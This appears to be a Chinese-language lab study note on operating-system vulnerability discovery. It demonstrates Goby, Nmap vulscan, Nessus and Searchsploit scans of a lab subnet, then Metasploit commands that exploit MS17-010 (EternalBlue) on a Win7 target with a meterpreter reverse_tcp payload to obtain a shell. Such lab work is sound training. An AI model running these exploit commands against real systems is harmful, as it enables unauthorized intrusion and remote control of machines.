漏洞发现-操作系统之漏洞探针类型利用修复

QQ截图20220311091604.jpg

漏洞扫描工具演示-Goby,Nmap,Nessus

Goby 忍者系统测试

进行扫描获得结果

QQ截图20220314101904.jpg

QQ截图20220314101408.jpg

查看靶机漏洞

QQ截图20220314101519.jpg

QQ截图20220314101526.jpg

可以根据漏洞编号去查看信息,并且可以寻找exp去进行攻击

QQ截图20220314101819.jpg

Nmap扫描

如果加上参数,就会调用script目录下的nse插件进行扫描

QQ截图20220314103041.jpg

输入命令进行扫描

nmap --script=vulscan/vulscan.nse 192.168.50.0/24

QQ截图20220314104119.jpg

Nessus安装-使用-插件库加载扫描

对主机以及网段进行扫描

QQ截图20220314143710.jpg

扫描的结果

QQ截图20220314143524.jpg

漏洞利用框架演示-Searchsploit

单点exp的获得

Searchsploit使用

QQ截图20220314150955.jpg

第一次用会提示需要更新漏洞信息

QQ截图20220314150015.jpg

github拉取文件后再次尝试

searchsploit -u

QQ截图20220314150440.jpg

搜索漏洞

QQ截图20220314153110.jpg

漏洞利用框架演示-Metasploit

尝试先搜索漏洞信息,根据搜索结果选择这个进行漏洞扫描,最后是用kali做的效果

QQ截图20220314160403.jpg

设置参数

QQ截图20220314160551.jpg

#扫描ms17-010漏洞
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.50.0/24
set THREADS 50
exploit

根据搜索结果,发现2个可以利用的目标

QQ截图20220314160629.jpg

对win7靶机尝试利用漏洞攻击

QQ截图20220314160825.jpg

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set RHOSTS 192.168.50.94
exploit

成功获取到shell

QQ截图20220314160858.jpg

关于Meterpreter命令,可以用help查看

QQ截图20220314161329.jpg